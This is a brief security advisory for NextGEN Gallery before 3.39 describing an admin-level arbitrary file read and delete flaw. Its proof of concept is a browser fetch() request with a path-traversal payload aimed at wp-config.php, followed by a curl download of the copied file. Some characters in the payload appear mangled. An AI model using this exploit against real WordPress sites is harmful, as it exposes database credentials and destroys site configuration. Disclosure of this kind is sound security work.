NextGEN Gallery < 3.39 - Admin+ Arbitrary File Read and Delete

Description The plugin is vulnerable to Arbitrary File Read and Delete due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.

PoC

1. Create a Gallery called “My Gallery” and note its ID. 2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly. await (await fetch(“/index.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded; charset=UTF-8” }, “body”: ‘photocrati_ajax=1&action;=enqueue_nextgen_api_task_list&q;=ADMIN_USERNAME&z;=ADMIN_PASSWORD&app;_config={}&task;_list=[{“name”:“x”,“type”:“gallery_edit”,“query”:{“id”:“GALLERY_ID”},“object”:{“name”:“x”,“image_list”:[{“path”:“…/wp-config.php”,“filename”:“xxxxxxx.jpg”}]}}]&extra;_data={}’, “method”: “POST”, “mode”: “cors” })).text(); 3. Download the file contents with the following curl command: curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg 4. Note that the wp-config.php file has been deleted.